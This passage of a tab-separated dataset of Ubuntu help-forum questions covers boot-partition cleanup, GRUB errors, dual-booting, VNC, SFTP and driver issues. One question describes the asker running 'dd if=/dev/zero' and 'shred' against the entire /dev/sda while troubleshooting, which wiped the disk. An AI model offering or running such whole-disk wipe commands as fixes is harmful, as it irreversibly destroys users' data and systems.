bytes ) 63 sectors/track , 255 heads 2048 hidden sectors 15665152 sectors total reclaiming unconnected clusters . checking free cluster summary . /dev/sdb1 : 2591 files , 3605610/3901041 clusters grow file system to fill the partition 00:00:05 ( error ) using libparted libparted messages ( info ) gnu parted can not resize this partition to this size . we 're working on it ! hence i asked the question again . @ user68186 - sorry there is no box labeled your answer when i open my question , when i open some others question i am seeing this box ! only add comment box is seen .
324027	why i am getting this `` can not remove '' line in terminal ?	i use terminal a lot . and just recently noticed this line popping in right after i stop being root ( after i type exit ) . /bin/rm : can not remove `/run/user/root/gvfs ' : is a directory why/what is this stand from ? does this affect somehow my system 's functionality ( as i did n't noticed ) ? if so , how can i fix this ?
324029	unable to remove older images from boot	my boot partition is full and i attempted to follow the solution found here : http : //askubuntu.com/a/142937/178039 running : dpkg -l 'linux-* ' | sed '/^ii/ ! d ; / ' '' $ ( uname -r | sed `` s/\ ( . *\ ) -\ ( [ ^0-9 ] \+\ ) /\1/ '' ) '' '/d ; s/^ [ ^ ] * [ ^ ] * \ ( [ ^ ] *\ ) . */\1/ ; / [ 0-9 ] / ! d' linux-headers-3.2.0-23 linux-headers-3.2.0-23-generic linux-headers-3.2.0-25 linux-headers-3.2.0-25-generic linux-headers-3.2.0-26 linux-headers-3.2.0-26-generic linux-headers-3.2.0-27 linux-headers-3.2.0-27-generic linux-headers-3.2.0-29 linux-headers-3.2.0-29-generic linux-headers-3.2.0-31 linux-headers-3.2.0-31-generic linux-headers-3.2.0-32 linux-headers-3.2.0-32-generic linux-headers-3.2.0-33 linux-headers-3.2.0-33-generic linux-headers-3.2.0-34 linux-headers-3.2.0-34-generic linux-headers-3.2.0-35 linux-headers-3.2.0-35-generic linux-headers-3.2.0-36 linux-headers-3.2.0-36-generic linux-headers-3.2.0-37 linux-headers-3.2.0-37-generic linux-headers-3.2.0-38 linux-headers-3.2.0-38-generic linux-headers-3.2.0-40 linux-headers-3.2.0-40-generic linux-headers-3.2.0-41 linux-headers-3.2.0-41-generic linux-image-3.2.0-31-generic linux-image-3.2.0-32-generic linux-image-3.2.0-33-generic linux-image-3.2.0-34-generic linux-image-3.2.0-35-generic linux-image-3.2.0-36-generic linux-image-3.2.0-37-generic linux-image-3.2.0-38-generic however , when i run the command sudo apt-get -y purge linux-image-3.2.0-31-generic to remove an older image i get this issue : you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-server : depends : linux-image-server ( = 3.2.0.49.59 ) but 3.2.0.40.48 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i run sudo apt-get -f install and this just tells me my boot partition is full : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-headers-3.2.0-23-generic linux-headers-3.2.0-31-generic linux-headers-3.2.0-26-generic linux-image-3.2.0-37-generic linux-headers-3.2.0-23 linux-headers-3.2.0-25 linux-headers-3.2.0-31 linux-headers-3.2.0-26 linux-headers-3.2.0-32 linux-headers-3.2.0-27 linux-headers-3.2.0-33 linux-headers-3.2.0-34 linux-headers-3.2.0-29 linux-headers-3.2.0-36 linux-headers-3.2.0-37 linux-headers-3.2.0-38 linux-headers-3.2.0-34-generic linux-headers-3.2.0-29-generic libspeex1 linux-headers-3.2.0-37-generic linux-headers-3.2.0-32-generic linux-headers-3.2.0-27-generic linux-image-3.2.0-38-generic libtheora0 daemon libservlet2.5-java linux-headers-3.2.0-38-generic linux-headers-3.2.0-25-generic linux-headers-3.2.0-33-generic linux-headers-3.2.0-36-generic use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-image-3.2.0-49-generic linux-image-server suggested packages : fdutils linux-doc-3.2.0 linux-source-3.2.0 linux-tools the following new packages will be installed : linux-image-3.2.0-49-generic the following packages will be upgraded : linux-image-server 1 upgraded , 1 newly installed , 0 to remove and 113 not upgraded . 7 not fully installed or removed . need to get 0 b/38.5 mb of archives . after this operation , 150 mb of additional disk space will be used . do you want to continue [ y/n ] ? ( reading database ... 487607 files and directories currently installed . ) unpacking linux-image-3.2.0-49-generic ( from ... /linux-image-3.2.0-49-generic_3.2.0-49.75_amd64.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.2.0-49-generic_3.2.0-49.75_amd64.deb ( -- unpack ) : failed in write on buffer copy for backend dpkg-deb during `./boot/vmlinuz-3.2.0-49-generic ' : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-49-generic /boot/vmlinuz-3.2.0-49-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-49-generic /boot/vmlinuz-3.2.0-49-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.2.0-49-generic_3.2.0-49.75_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) running apt-get autoremove gives the me : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-server : depends : linux-image-server ( = 3.2.0.49.59 ) but 3.2.0.40.48 is installed e : unmet dependencies . try using -f. it seems i am in a loop . how can i fix this issue to finally upgrade my server ? i am on 12.04 edit 1 : when attempting to remove an image on boot : sudo rm /boot/initrd.img-3.2.0-31-generic sudo apt-get -y purge linux-image-3.2.0-31-generic i get : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-server : depends : linux-image-server ( = 3.2.0.49.59 ) but 3.2.0.40.48 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i then try and run apt-get -f install and get this error : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-headers-3.2.0-23-generic linux-headers-3.2.0-31-generic linux-headers-3.2.0-26-generic linux-image-3.2.0-37-generic linux-headers-3.2.0-23 linux-headers-3.2.0-25 linux-headers-3.2.0-31 linux-headers-3.2.0-26 linux-headers-3.2.0-32 linux-headers-3.2.0-27 linux-headers-3.2.0-33 linux-headers-3.2.0-34 linux-headers-3.2.0-29 linux-headers-3.2.0-36 linux-headers-3.2.0-37 linux-headers-3.2.0-38 linux-headers-3.2.0-34-generic linux-headers-3.2.0-29-generic libspeex1 linux-headers-3.2.0-37-generic linux-headers-3.2.0-32-generic linux-headers-3.2.0-27-generic linux-image-3.2.0-38-generic libtheora0 daemon libservlet2.5-java linux-headers-3.2.0-38-generic linux-headers-3.2.0-25-generic linux-headers-3.2.0-33-generic linux-headers-3.2.0-36-generic use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-image-server the following packages will be upgraded : linux-image-server 1 upgraded , 0 newly installed , 0 to remove and 113 not upgraded . 5 not fully installed or removed . need to get 0 b/2,370 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? setting up linux-image-3.2.0-40-generic ( 3.2.0-40.64 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) the link /initrd.img is a dangling linkto /boot/initrd.img-3.2.0-49-generic examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.2.0-40-generic /boot/vmlinuz-3.2.0-40-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-40-generic /boot/vmlinuz-3.2.0-40-generic update-initramfs : generating /boot/initrd.img-3.2.0-40-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.2.0-40-generic /boot/vmlinuz-3.2.0-40-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.2.0-40-generic /boot/vmlinuz-3.2.0-40-generic generating grub.cfg ... found linux image : /boot/vmlinuz-3.2.0-49-generic found linux image : /boot/vmlinuz-3.2.0-41-generic found linux image : /boot/vmlinuz-3.2.0-40-generic found initrd image : /boot/initrd.img-3.2.0-40-generic found linux image : /boot/vmlinuz-3.2.0-39-generic found initrd image : /boot/initrd.img-3.2.0-39-generic found linux image : /boot/vmlinuz-3.2.0-38-generic found initrd image : /boot/initrd.img-3.2.0-38-generic found linux image : /boot/vmlinuz-3.2.0-37-generic found initrd image : /boot/initrd.img-3.2.0-37-generic found linux image : /boot/vmlinuz-3.2.0-36-generic found initrd image : /boot/initrd.img-3.2.0-36-generic found linux image : /boot/vmlinuz-3.2.0-35-generic found initrd image : /boot/initrd.img-3.2.0-35-generic found linux image : /boot/vmlinuz-3.2.0-34-generic found linux image : /boot/vmlinuz-3.2.0-33-generic found linux image : /boot/vmlinuz-3.2.0-32-generic found linux image : /boot/vmlinuz-3.2.0-31-generic found memtest86+ image : /memtest86+.bin done setting up linux-image-3.2.0-41-generic ( 3.2.0-41.66 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.2.0-41-generic /boot/vmlinuz-3.2.0-41-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-41-generic /boot/vmlinuz-3.2.0-41-generic update-initramfs : generating /boot/initrd.img-3.2.0-41-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.2.0-41-generic /boot/vmlinuz-3.2.0-41-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.2.0-41-generic /boot/vmlinuz-3.2.0-41-generic generating grub.cfg ... found linux image : /boot/vmlinuz-3.2.0-49-generic found linux image : /boot/vmlinuz-3.2.0-41-generic found initrd image : /boot/initrd.img-3.2.0-41-generic found linux image : /boot/vmlinuz-3.2.0-40-generic found initrd image : /boot/initrd.img-3.2.0-40-generic found linux image : /boot/vmlinuz-3.2.0-39-generic found initrd image : /boot/initrd.img-3.2.0-39-generic found linux image : /boot/vmlinuz-3.2.0-38-generic found initrd image : /boot/initrd.img-3.2.0-38-generic found linux image : /boot/vmlinuz-3.2.0-37-generic found initrd image : /boot/initrd.img-3.2.0-37-generic found linux image : /boot/vmlinuz-3.2.0-36-generic found initrd image : /boot/initrd.img-3.2.0-36-generic found linux image : /boot/vmlinuz-3.2.0-35-generic found initrd image : /boot/initrd.img-3.2.0-35-generic found linux image : /boot/vmlinuz-3.2.0-34-generic found linux image : /boot/vmlinuz-3.2.0-33-generic found linux image : /boot/vmlinuz-3.2.0-32-generic found linux image : /boot/vmlinuz-3.2.0-31-generic found memtest86+ image : /memtest86+.bin done setting up linux-image-3.2.0-49-generic ( 3.2.0-49.75 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.2.0-49-generic /boot/vmlinuz-3.2.0-49-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-49-generic /boot/vmlinuz-3.2.0-49-generic update-initramfs : generating /boot/initrd.img-3.2.0-49-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.2.0-49-generic /boot/vmlinuz-3.2.0-49-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.2.0-49-generic /boot/vmlinuz-3.2.0-49-generic generating grub.cfg ... found linux image : /boot/vmlinuz-3.2.0-49-generic found initrd image : /boot/initrd.img-3.2.0-49-generic found linux image : /boot/vmlinuz-3.2.0-41-generic found initrd image : /boot/initrd.img-3.2.0-41-generic found linux image : /boot/vmlinuz-3.2.0-40-generic found initrd image : /boot/initrd.img-3.2.0-40-generic found linux image : /boot/vmlinuz-3.2.0-39-generic found initrd image : /boot/initrd.img-3.2.0-39-generic found linux image : /boot/vmlinuz-3.2.0-38-generic found initrd image : /boot/initrd.img-3.2.0-38-generic found linux image : /boot/vmlinuz-3.2.0-37-generic found initrd image : /boot/initrd.img-3.2.0-37-generic found linux image : /boot/vmlinuz-3.2.0-36-generic found initrd image : /boot/initrd.img-3.2.0-36-generic found linux image : /boot/vmlinuz-3.2.0-35-generic found initrd image : /boot/initrd.img-3.2.0-35-generic found linux image : /boot/vmlinuz-3.2.0-34-generic found linux image : /boot/vmlinuz-3.2.0-33-generic found linux image : /boot/vmlinuz-3.2.0-32-generic found linux image : /boot/vmlinuz-3.2.0-31-generic found memtest86+ image : /memtest86+.bin done setting up linux-image-server ( 3.2.0.40.48 ) ... dpkg : dependency problems prevent configuration of linux-server : linux-server depends on linux-image-server ( = 3.2.0.49.59 ) ; however : version of linux-image-server on system is 3.2.0.40.48. dpkg : error processing linux-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-server e : sub-process /usr/bin/dpkg returned an error code ( 1 )
324037	unity via tightvnc on ubuntu 13.04	i can not seem to get unity to run and be accessible via vnc , all i get is the ubuntu desktop wallpaper , and mouse etc . but no unity launcher or top bar . currently using the default xstartup to get that result . also tried the set up found here tightvncserver on ubuntu 12.04 server with ubuntu-desktop installed no unity but that does not work as ubuntu-2d no longer used . what xstartup settings would i need to use to get unity working right ? i would rather stick to using tightvnc as the vnc server as there is no physical screen .
324038	how can i get user/system information in a qml mobile app ?	in this specific case , i 'd like to use the full name of the currently logged-in user in a qml app ( not the logname ) . as far as i found out , system calls can not yet be used ( and would not be an elegant solution ) . also the ubuntu sdk documentation seems to cover only ui-related topics . is there a method to access the full user name from within a qml app ? and in general , are system apis or the unity api available to qml apps ?
324039	chroot sftp not able to login	i am trying to set up sftp access on my server and chroot the users into a samba share . when i edit /etc/ssh/sshd_config and add match group sftpusers chrootdirectory /srv/samba/share forcecommand internal-sftp i am no longer able to log in . when i try to ssh into the server i get write failed : broken pipe and my sftp client says the username and password are not accepted by the server if i comment out those lines i am able to log in via ssh and sftp again . /srv/samba/ is rwxr-xr-x root root /srv/samba/share is rwxrwxr-x root sftpusers anyone know what i can do to solve this ?
324040	how can i send sms from ubuntu to cell phones ?	i 'm tired of paying for my cell phone . it 's just a small glorified computer and anyone wanting to contact me can contact me when i 'm home . i would , however , be willing to pay small fee for the ability to use sms text messaging using my internet on my computer . is this possible in ubuntu ?
324041	ubuntu update manager and software center crash	having trouble using either update manager or software center in ubuntu 13.04 . an error shows in the top task bar stating that there are installed packages that have unmet dependencies . any tips ?
324043	error : grub rescue >	had dual boot with ubuntu 12.0 and windows xp . windows partition got corrupted so i tried to reinstall xp by bootable disk . but after formatting of c : when setup copied files for installation then upon restart it stuck at grub and did n't resumed automatically . now i boot in linux partition but ubuntu did n't loaded and stuck at checking disk . so open the maintenance shell and executed command : sudo dd if=/dev/zero of=/dev/sda it took around 2hrs for the complete execution of the command . then when i rebooted the system it showed : error : no such partition grub rescue > after this whenever i try to install windows then after auto restart setup does n't resumes and stuck at grub rescue error > after all this using bootable usb for ubuntu i executed this command : shred -n 5 -vz /dev/sda command executed successfully in 2hrs around.still no success achieved as now the situation is i am unable to install neither ubuntu nor windows as it stuck at installing ubuntu attempt to mount a file system with ext4 in scsi1 partion # 1 ( sda ) at / failed . installing windows stuck at grub rescue error if trying to install windows . what to do ? is my harddisk wrecked and need replacement ?
324046	printing to email	i would like to setup my ubuntu 13.04 system to have a printer that directly prints to a pdf and sends that attached to a predefined email address ... etc . how do i setup my system to best achieve this ? i have so far added cups-pdf package which supposedly takes care of the pdf creation but i want that pdf printer to automatically send an email to a predefined address ... ideally using my google online account and not the local mailing clients ... etc . please help to set this all up .
324051	12.04 lock screen and password prompt skipped after resume from suspend	12.04 ( 32-bit ) , unity desktop skips the login screen after resuming from suspend mode . it just starts the session with the user logged in . i have a password set and it shows the login screen on boot or reboot , and it was the same on resume after suspend , but recently it starts skipping the login screen on resuming after suspend . i would like to have the login screen showing up again after suspend . how can i fix this ? thank you for your time and help ! this is my settings in system settings - > brightness and lock and in ubuntu tweak the login settings :
324060	mixed mode in steam ( wine/native )	i 'm still relatively new to linux 's more technical side , but i wanted to know if it was possible to have the native linux steam client installed and launch games that do not have a native port from wine , while launching the native games.. well.. natively . is this possible to do without modifying the steam 's code ? because it reports that the non-native game is not for the system if you attempt to launch it . this would be really great for while we 're waiting for more games to be ported , as then we would not actually have to install 2 separate clients on the machine . thanks !
324062	installing crunchbang ( grub ) alongside wubi	is it possible to dual-boot with ubuntu 12.04 , windows 7 , and crunchbang ? i have ubuntu installed with wubi , so there is a virtual drive inside my c : / drive . if i were to install crunchbang normally in a partition , would it interfere with wubi , since crunchbang uses grub ?
324063	ubuntu on a windows me pc	will ubuntu ore lubuntu work on my old windows me pc , or will i have to try an older edition of l/ubuntu -if so what version ?
324064	use path bar and address bar in nautilus	by default , nautilus use/show the path bar : using ubuntu tweak i managed to set by default the address bar : is it possible to set both of them as default ( show both : the buttons and the text input ) ? note : i know that i can use ctrl+l to switch between them , so i 'm not interested about this .
324066	how to make the nautilus icon open the existing window instead of a new one	for some reason sometimes when i have a nautilus window open , then switch to a different window , when i click on the nautilus icon in the unity bar , it opens a new nautilus window instead of the existing one . yes the old window is still there , if i minimize the fullscreen window it reveals both of them , and the nautilus icon has two ticks . i think this question 's been asked already , but there 's no solutions .
324070	cant ' dual install xubuntu and windows 7	had xubuntu 12.04 installed on my computer . later on i decided to dual install windows 7 . i opened up gparterd and created a partition for windows 7 and formatted it at ntsf . well , when i try to install windows 7 , it does n't recognized the ntsf partition . it states that all the partitions are gpt file format . even though i have gone in and reformatted that partition several times as ntsf , windows 7 still wo n't recognize it at anything other than gpt file system . i even used a gparted lived cd to format that partition as well . how do i format the partition in ntsf where windows 7 will recognize it as such and install onto it ?
324071	xubuntu , no battery detected	recently i installed xubuntu on my old latitude d620 . i 'm having a problem where there 's no battery indicator in the taskbar and there 's no option to turn it on . heck , xubuntu ca n't even find the battery . there 's no battery section when i go to /proc/acpi/ . when i run acpi -v it outputs tyler @ tyler-d620 : ~ $ acpi -v adapter 0 : on-line thermal 0 : ok , 54.5 degrees c thermal 0 : trip point 0 switches to mode critical at temperature 126.0 degrees c cooling 0 : processor 0 of 10 cooling 1 : processor 0 of 10 by the way , should i be worried about that 126 degc thing ? anways when i run upower -d it outputs : tyler @ tyler-d620 : ~ $ upower -d device : /org/freedesktop/upower/devices/line_power_ac native-path : /sys/devices/lnxsystm:00/lnxsybus:00/acpi0003:00/power_supply/ac power supply : yes updated : wed jul 24 15:47:27 2013 ( 1071 seconds ago ) has history : no has statistics : no line-power online : yes daemon : daemon-version : 0.9.20 can-suspend : yes can-hibernate : no on-battery : no on-low-battery : no lid-is-closed : no lid-is-present : yes is-docked : no as a final note i would like to note that this is my first time using xubuntu/linux in general ... so please go easy on me : p thank you the help ! edit : i suppose i should add that the laptop can run without the adapter plugged in , but only for about 20 minutes .
324072	how to exclude/delete files only ?	is there a way to exclude all files , in all subfolders , and keep the folder structure ?
324077	how do i use avahi to display system as .local	installing and running avahi will make it visible via zeroconf , which means that other machines on the lan that use zeroconf will be able to access it as .local . how do i do that ?
324085	how to create multiple pages in html5 app and link them together	i 'm beginning to actually develop an html5 app for learning for ubuntu touch . i have the main html5 app layout but i want to make more pages for the other items in the list view and link each page to it 's own item in the list view ? anybody want to help a newbie ? thank you !
324087	can the dual boot start be changed from grub to something else ?	could the dual boot be changed from the usual grub menu to making a selection with the keyboard ? the idea is to select between , say , windows and ubuntu with a key instead of having grub to appear . for example : on pc start up , press f1 to load windows , or f2 if i want to star ubuntu . could this be done so nobody knows there are two different operating systems installed ?
324092	gnome 3 panel shrinking application indicators	today i added a couple of indicators to my gnome-shell panel , like skype , weather and some sensors . the problem that i 'm facing is that indicators that take a considerable amount of space , like the clock ( that is showing the time and date ) shrank considerably . i realized that the total amount of space occupied by all these indicators never exceeds 50 % of my screen width . i 'd like to avoid this behavior , and allow each indicator to take the space it needs . please , see ! also note how the clock is no longer in the middle , but now it 's on the right corner . thanks !
324093	install new version of ubuntu on a dual boot xp /ubuntu 11.04 system	my computer does not support a usb boot . it is an hp pavilion dz6000 laptop . how can i install version 12.04 on my system ? the computer has a little less than 1gb memory . is that enough ? version 11.04 works well .
324098	static ip xubuntu 13.04 not working at all ( wlan0 )	okay , so i am doing my file like this : $ sudo gedit /etc/network/interfaces auto lo wlan0 iface lo inet loopback iface wlan0 inet static address xxx.xxx.xxx.xxx # i use the address i want netmask xxx.xxx.xxx.xxx # 255.255.255.0 gateway xxx.xxx.xxx.xxx # 192.168.2.1 my router ip dns xxx.xxx.xxx.xxx # 8.8.8.8 google this just does n't work at all
324099	no taskbar and icons 13.04	so i 've been playing around the past few days with ubuntu ( still new to it ) , and then i wanted to upgrade my nvidia drivers to the latest beta version , i messed up horribly ad now the taskbar and the icons do n't show + the resolution is in 1280x720 instead of 1920x1080 and i have no internet access in ubuntu . oh and i 'm dual-booting ubuntu and windows 7 help would be greatly appreciated .
324100	status 0xc000007b	i am trying to dual boot windows 8 and ubuntu , i burned it to a disk and everything went perfectly , answered the install questions , then it said it was installed and reboot to start it . so i rebooted my computer , and chose ubuntu , but it gave me the black screen where it said status 0xc000007b file : \ubuntu\winboot\wubildr.mbr i have disabled secure boot and enabled legacy boot , i have tried all of the methods described in previous questions can anyone direct me to more information or help ?
324105	setting am/pm time on lubuntu	really stupid question -- how do i get the time on lubuntu into an am/pm format instead of the 24-hour clock ? i have tried the time/date , and have gotten nowhere .
324107	i 've forgotten my password	its been some time since i 've turned on my dell xg-600 lap-top . when i finally turned it on , i discovered that for the life of me i can not remember the password , let alone the pass phrase , which is a mystery to me.can anybody be of assistance in helping me resolve this small , but annoying problem ?
324108	install ubuntu 13.04 while having win-7 and linuxmint installed	the complete question is , i have windows 7 installed as primary/default os on my pc and i have installed linuxmint using wubi under windows . and now i want to install ubuntu 13.04 so that i can start working on it but i dont want to lose the previous installations ! is it possible to install ubuntu either by wubi or as standalone by not loosing any data/installation .
324110	newbie : ubuntu one : struggling with the sync	this is my first attempt at using a linux based os . so far , i am rather pleased with ubuntu . i signed up using ubuntu one , i then logged into the ubuntu one cloud site . i created a folder , i uploaded some personal varsity documents into a folder . i run the ubuntu one app , but i have no idea on how to have the folder created shown up . i have included a picture of what i did , and hope to achieve . kind regards . i have included a link explaining what i am looking for and the problem faced .
324114	how to make wine gui elements look like modern windows elements	i started using wine to run windows apps on ubuntu , but i see that the style of user interface elements like buttons etc . is too old , like the buttons of windows 98 , is there a way to make it like windows 7 or 8 ? ?
324115	ralink bluetooth not working in ubuntu 13.04	my bluetooth is not working in ubuntu 13.04 . i am unable to turn it on and also , bluetooth icon does n't show up in the top bar . i asked about this on # ubuntu irc and they said that i am missing the proprietary drivers for it . there is nothing under additional drivers in software and updates bluetooth does work 'try ubuntu mode ' when i boot ubuntu from dvd/usb . how can i get the required drivers ?
324127	courier imap postfix question folders and namespace	so , i 'm running a small email server . on this server , i have installed and run postfix with courier-imap . it works great , but i need to expand it 's folder options for better record keeping . whenever i try to make a new folder , i just get subdirectories of inbox . i found this article , but it was no help : http : //www.courier-mta.org/faq.html # namespace i understand that inbox ca n't be changed . i want to make another directory on the same level as inbox , not as a subdirectory . from what i gather from the faq , courier says that it 's not courier 's fault ! is it possible to make another root level directory ? i tried moving to dovecot , but that had it 's own host of issues . thanks , p
324129	how to install aptana	i downloaded aptana stand alone version . now i am on ubuntu , but can not find any guide for installation . if you helped me , that would be great .
324131	ubuntu desktop for nexus 7	will the ubuntu desktop for nexus 7 development continue , or is the sole development focus now on ubuntu touch ?
324132	partition concerns - installing ubuntu 12.04 on new laptop	i plan to install ubuntu 12.04 on my new samsung np540 laptop . i do , however , have two concerns . the first issue is that samsung have decided that it is necessary to manipulate the bios in order to boot from usb or cd . the `` os mode '' has to be changed from uefi os to csm os in order to allow the usb to load . i would like to keep windows 8 and thus have a menu that allows me to boot into windows or ubuntu as i choose . at `` installation type '' ( when running the installation usb ) the screen shows : `` this computer currently has no detected operating systems '' even though windows 8 does exist . this presumably happens because i have selected the csm os . the second point is about my partitions . i have n't needed to play around with partitions for some years and do n't want to mess up the hard drive . my partitions are : /dev/sda 500gb [ ata hard drive ] partition type space used function /sda1 ntfs 523mb 356mb recovery /sda2 fat32 314mb 33mb efi /sda3 ? 134mb unknown ? /sda4 ntfs 471834mb 35984mb c : \ drive ( with windows 8 ) /sda5 ntfs 26226mb 25364mb recovery /sda6 fat32 1073mb 740mb recovery /dev/sdb 24gb [ ssd drive ] [ ... ] what should i do ? do i reduce the size of /sda4 ? also , i have six partitions . is n't that the maximum permitted ? the options for modifying each partition are : new partition size in megabytes ( e.g . expand / reduce ) . use as ( e.g . ext2 , ext3 , ext4 ) . format the partition ( check box or leave blank ) . mount point ( e.g . / ) . i would appreciate some advice as to the best solution . thanks !
324139	how to copy/backup all ubuntu files in a way i can read them without restoring ?	i am looking for a good way to backup my linux partition in a way that i can access the backuped files from a windows pc . i want the entire drive backed up because i want to make sure i have all data and config files saved if i need them again because im going to reinstall my computer . can anyone help me out ?
324143	when is ubuntuforums.org going to be back up ?	just wondering if anyone knows when ubuntuforums will be up and running again ? thanks !
324146	start up disk creator	when i try to make a bookable usb stick it will only work with the fat format ... .but when i try to create it with the ntsb format it wont work ... .internal hdd is in the ntsb format..does this matter ?
324147	unable to access terminal	i 've loaded ubuntu 12.04 lts onto my dell xps 1530 ( vista ) laptop , but am having serious issues . i can run ubuntu fine when testing it from the dvd , but after installation it says i must restart to complete . once i restart , i see nothing but the black screen and cursor . i 've poked around a fair bit and see that question has been addressed a few times , but every instance begins with accessing the terminal - which i 'm unable to do unless i 'm in demo mode from the dvd . once that is ejected , hitting ctrl+alt+t or other combos does nothing . how can i access the terminal another way ? any tips appreciated . -linux newbie .
324155	how to reinstall latest ubuntu touch on nexus 4 ?	i 've followed the instructions on https : //wiki.ubuntu.com/touch/install , first doing the steps that lead to phablet-flash -b and then the manual ones . in both cases , i get stuck at the google boot screen . it does not boot into touch . no errors during manual install , and adb devices shows the device , but i get the following with phablet-flash or phablet-flash -b ( second and subsequent times , not the first time ) : device detected as /system/bin/sh : getprop : not found unsupported device , autodetect fails device when working on flipped images , detection does not work and would require -d not clear what that all means . the nexus 4 had the initial touch dev preview on it , fyi . i saw no separate instructions for upgrading from that .
324164	chosing os on boot with broken enter key	summary : enter button unavailable when choosing os ( either ubuntu or windows7 ) today i have installed ubuntu 13.04 alongside windows7 . when bios asks which os to run i am unable to select other than the default - which is selected after 10s timeout . ( if i use the arrow keys the timeout no longer counts down ) . i changed the default os that boots after grub-timeout to my regular windows 7 ... as described here : how do i set the grub timeout and the grub default boot entry ? . however i 'm wondering if there 's any way i can select ubuntu by other than with the 'enter ' button . this button happens to be the only button that is not working and i have to plug in another keyboard via usb . note : on windows i have mapped another key to act as the 'enter ' button , and hoping to do the same within ubuntu - if you are able to help me there as well , it would be appreciated but not my main concern . if you can help me as to what i could possibly do , i give you 5 hundred props : d
324166	what desktop distro i should use when coming from windows ?	i 've been using windows 8 as my laptop since it came out , though i hate it , i really did n't really have a choice since my school only allowed windows , and since my mom bought me windows 8 , i just put it on . i 've used linux since the summer of 2012 so i 'm still a bit of a newbie . i use linux a lot , much more than windows , it 's just that i run linux on virtual machines so i can get the linux experience , and since i have 8 gigs of ram , i can spare about 5 for the virtual machines . my main linux distros are arch , ubuntu , and mint . though i use arch the most because i love the customization it offers because i 'm a diy kind of guy . and since my laptop crashed because windows experienced a problem and restored everything , i 'm thinking of installing linux on my computer , so i have to choose a distro to download , i ca n't really decide which to put on . i really like linux mint because it 's simple and uses apt-get , but i do n't like mate or cinnamon because of their simple interfaces . i like fedora because its always on the latest software , but yum is a bit too slow . i like arch becuase it has a really fast boot up , pacman is awesome , almost all packages are vanilla , but i do n't like that it does n't have defaults , but i 'm probably still going to install it . but i need to find special drivers during installations for hibernating and nvidia . my laptops specs are : i7 3.3 ghz 8gb ram 2gb nvidia gtx 660 gpu 1tb hdd so my questions are : should i use arch as my main laptop distro ? if not , what should i use ? what drivers should i include so arch can run on the laptop ? what drivers do i need to allow my laptop to hibernate safely ? what nvidia driver do i need , is it possible to allow dual-booting of arch and windows ?
324168	position of window titeles in xubuntu/compiz 12.04	how can i set up window titles in the left corner ? i am using gconf-editor to change themes , fonts etc whilst using compiz but i couldnt find this option .
324172	install hangs on reboot , virtualbox 4.2.16 , ubuntu 12.04 guest on windows 7 host	i am a linux noob . i am trying to set up a vm so i can learn to program in c ( i hear linux is the best platform to do that on ) . i have successfully installed ubuntu 12.04 guest on one win 7 host ( vbox 4.2.16 ) and i have failed on two win 7 hosts with the same symptom : the install gets as far as this screen : okay , anyway , the install gets that far but then the vm stops responding . confirmed that virtual cd is not in the virtual drive . i press enter but nothing happens . i have waited maybe 30 mins , tried again , still nothing . again , this same result has occurred over multiple attempts with two different win 7 hosts . the only common thread that i can see between the two failed installs is that both win 7 machines are laptops , whereas the successful install occurred on a desktop . i know , that is a weak correlation . i wondered if the touchpad peripherals confuse it for some reason ? shot in the dark . any help would be much appreciated . i am now thinking of trying a different flavor of linux or perhaps a different vm ( e.g . windows virtual pc ) . will try to remember to post a followup if i can do that successfully . again thanks in advance for any help . i should add , in case it is not clear : the screen shown in the screen capture is after the install has completed . the vm booted up from virtual cd and went through the install just fine . but at this final stage the thing hangs . i have `` force shutdowned '' the vm and then rebooted , but on occasion i get an error like `` broken pipe '' and frankly i do not want to deal with the possibility of a 99 % completed os install where there 's some slim chance of some catastrophic system error occurring at some point , hosing my system . however , reassurances would be welcome ... -adam
324173	wrc54g wireless adaptor	how do i install a wrc54g wireless adaptor and driver on ubuntu ? are there special drivers needed for ubuntu ? i have tried using the regular driver and it would not install . tried using update feature and that was unsuccessful as well .
